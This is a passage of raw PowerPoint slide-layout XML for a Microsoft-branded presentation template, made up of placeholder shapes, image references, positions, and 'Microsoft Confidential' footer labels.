            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2262188" y="4114800"/>
            <a:ext cx="4619625" cy="1001713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="6474429"/>
            <a:ext cx="3657600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="cover_graphic1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1069848"/>
            <a:ext cx="9144000" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1517838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59FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</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B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32576856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 MS-Closing Pic2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 3" descr="Microsoft logo with new tagline black"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2262188" y="4114800"/>
            <a:ext cx="4619625" cy="1001713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="6474429"/>
            <a:ext cx="3657600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="banner_graphic3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1069848"/>
            <a:ext cx="9144000" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12925863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4 Legal">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531352" cy="411480"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"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0" name="Text Placeholder 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="914400"/>
            <a:ext cx="8531352" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="112713" indent="6350">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1050"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3962400"/>
            <a:ext cx="8531352" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="112713" indent="6350">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1050"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Placeholder 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3276600"/>
            <a:ext cx="8531352" cy="411480"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3725672"/>
            <a:ext cx="5486400" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182880" tIns="0" rIns="182880" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1050" b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1050"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1050"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1050"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="112713" indent="6350">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1050"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17"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9" name="Picture 18" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062429" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Date Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1/1/2009</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{27F89AD4-B608-49DD-ADE0-4FA08F31E632}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Footer Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="675640"/>
            <a:ext cx="5486400" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182880" tIns="0" rIns="182880" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1050" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9049987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Demo, Video etc. &quot;special&quot; slides">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0250" y="3658106"/>
            <a:ext cx="8032750" cy="609094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="0" kern="1200" cap="none"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dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730250" y="4343400"/>
            <a:ext cx="7043208" cy="461665"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>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Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072886" y="520006"/>
            <a:ext cx="7690114" cy="1384994"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4400" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>click to</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="C:\Users\raandree\Desktop\Windows-brand_v_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77200" y="5943600"/>
            <a:ext cx="601662" cy="53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88710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382000" cy="664797"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="838200"/>
            <a:ext cx="8382000" cy="2000548"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effect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697920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Page">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0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3011" y="2228824"/>
            <a:ext cx="9144095" cy="2404872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2916310"/>
            <a:ext cx="4408564"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513293" y="3607675"/>
            <a:ext cx="4408563"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7" name="Picture 16"/>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
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="4913394"/>
            <a:ext cx="7996525"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407315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Page (All Up)">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0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3011" y="2228824"/>
            <a:ext cx="9144095" cy="2404872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15"/>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
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="4913394"/>
            <a:ext cx="7996525"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20" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="5199730"/>
            <a:ext cx="7996525"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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2916310"/>
            <a:ext cx="5084425" cy="555626"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:defRPr sz="3600" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master Title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513294" y="3607675"/>
            <a:ext cx="5084424" cy="655320"/>
          </a:xfrm>
